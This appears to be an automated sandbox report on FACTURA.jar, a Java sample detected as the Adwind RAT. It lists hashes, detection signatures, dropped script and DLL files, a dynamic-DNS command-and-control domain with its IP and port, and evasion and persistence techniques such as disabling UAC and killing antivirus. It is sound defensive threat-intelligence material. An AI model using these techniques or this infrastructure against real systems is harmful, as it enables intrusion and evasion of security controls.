Windows Analysis Report
FACTURA.jar

Overview

General Information

Sample name: FACTURA.jar
Analysis ID: 1426949
MD5: df2d12625998b7c51a4eab26d3a42e7e
SHA1: 3d0403ab389c056beae99b7e71cca51ad521c870
SHA256: 380c08c3471775e3eccdcd3c755074457e7cdafc02e92e7b9ceaad8b500ea8a6
Tags: Adwindjar
Infos:

Detection

ADWIND
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected ADWIND Rat
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AdWind RATs dll
Creates a Image File Execution Options (IFEO) Debugger entry
Creates an undocumented autostart registry key
Disable UAC(promptonsecuredesktop)
Disables UAC (registry)
Disables Windows system restore
Disables zone checking for all users
Excessive usage of taskkill to terminate processes
Exploit detected, runtime environment starts unknown processes
Found suspicious ZIP file
Java source code contains strings found in CrossRAT
Sigma detected: Adwind RAT / JRAT File Artifact
Sigma detected: Potential Attachment Manager Settings Associations Tamper
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Processes Spawned by Java.EXE
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Uses regedit.exe to modify the Windows registry
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Add executable type to lowriskfiletypes to avoid warning prompt
Binary contains a suspicious time stamp
Changes image file execution options
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
PE file contains sections with non-standard names
PE file does not import any functions
Queries the installed Java version
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Shell Process Spawned by Java.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara signature match

Classification

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Retrive6922435490390475939.vbs Avira: detection malicious, Label: VBS/Agent.281
Source: C:\Users\user\AppData\Local\Temp\Retrive4451837785175678294.vbs Avira: detection malicious, Label: VBS/Antiav.jre
Source: C:\Users\user\AppData\Local\Temp\Windows266478547194213581.dll Avira: detection malicious, Label: TR/Spy.Agent.lusda
Source: C:\Users\user\AppData\Local\Temp\Retrive2729271214941122137.vbs Avira: detection malicious, Label: VBS/Antiav.jre
Source: C:\Users\user\AppData\Local\Temp\Retrive536118811270301171.vbs Avira: detection malicious, Label: VBS/Agent.281
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Windows266478547194213581.dll ReversingLabs: Detection: 85%
Multi AV Scanner detection for submitted file
Source: FACTURA.jar ReversingLabs: Detection: 21%
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\README.txt
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt
Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdb source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.000000000466E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004643000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libverify\verify.pdb source: xcopy.exe, 00000015.00000003.1744124031.000000000348F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Win10\Desktop\RetriveTitle_vb2010\Release\TitleWindow.pdb source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2856505009.0000000073AC8000.00000002.00000001.01000000.0000000A.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004612000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: xcopy.exe, 00000015.00000003.1742568613.000000000348F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1707060885.000000000348D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jabswitch\jabswitch.pdb source: xcopy.exe, 00000015.00000003.1712140938.000000000348F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: xcopy.exe, 00000015.00000003.1733577711.000000000348F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\x64\Release\CryptUtil.pdb source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004643000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004612000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\Windows10\Desktop\RetriveTitle\x64\Release\TitleWindow.pdb source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libkrb5\w2k_lsa_auth.pdb source: xcopy.exe, 00000015.00000003.1744124031.000000000348F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: xcopy.exe, 00000015.00000003.1733577711.000000000348F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libbci\bci.pdb source: xcopy.exe, 00000015.00000003.1708776486.000000000348E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Windows10\Desktop\RetriveTitle\x64\Release\TitleWindow.pdb source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libt2k\t2k.pdb:: source: xcopy.exe, 00000015.00000003.1742568613.000000000348F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsound\jsound.pdb source: xcopy.exe, 00000015.00000003.1732774705.000000000348F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjfr\jfr.pdb source: xcopy.exe, 00000015.00000003.1714657743.000000000348F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\a01\_work\38\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: xcopy.exe, 00000015.00000003.1743585507.000000000348F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: xcopy.exe, 00000015.00000003.1742568613.000000000348F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libdt_socket\dt_socket.pdb source: xcopy.exe, 00000015.00000003.1709635619.000000000348F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libt2k\t2k.pdb source: xcopy.exe, 00000015.00000003.1742568613.000000000348F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jabswitch\jabswitch.pdb,,+ source: xcopy.exe, 00000015.00000003.1712140938.000000000348F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsound\jsound.pdb## source: xcopy.exe, 00000015.00000003.1732774705.000000000348F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdbP8PP@Y source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.000000000466E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004643000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities
barindex
Exploit detected, runtime environment starts unknown processes
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\wscript.exe

Networking
barindex
Uses dynamic DNS services
Source: unknown DNS query: name: pnauco5.ddns.net
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49740 -> 103.151.123.225:5000
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown DNS traffic detected: queries for: pnauco5.ddns.net
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/3
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/allow-java-encodings
Source: java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/allow-java-encodings3
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/allow-java-encodings9
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/allow-java-encodingsorg/a9
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/continue-after-fatal-error
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/continue-after-fatal-error=
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/continue-after-fatal-errors/inter=
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1731447511.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2847662929.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/create-cdata-nodes
Source: java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/create-cdata-nodes3L
Source: java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/disallow-doctype-decl
Source: java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/disallow-doctype-declk
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1731447511.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2847662929.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/dom/create-entity-ref-nodes
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1731447511.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2847662929.000000001518C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/dom/create-entity-ref-nodes?
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion9
Source: java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansionS
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1731447511.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2847662929.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/dom/include-ignorable-whitespace
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/dom/include-ignorable-whitespace/
Source: java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/dom/include-ignorable-whitespacec?
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/g3
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotations
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotations9
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotationsmen9
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocations
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocations;
Source: java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocationsC
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocationsmpl
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1731447511.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2847662929.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/include-comments
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1731447511.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2847662929.000000001518C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/include-comments0
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/parser-settings
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/parser-settings7
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicates
Source: java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicates3K
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicatesO
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicatespacheO
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-only
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-only/
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-onlye/
Source: java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/namespace-growth
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1761890129.0000000003570000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtd
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtd:
Source: java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtdK
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtdch:
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refs
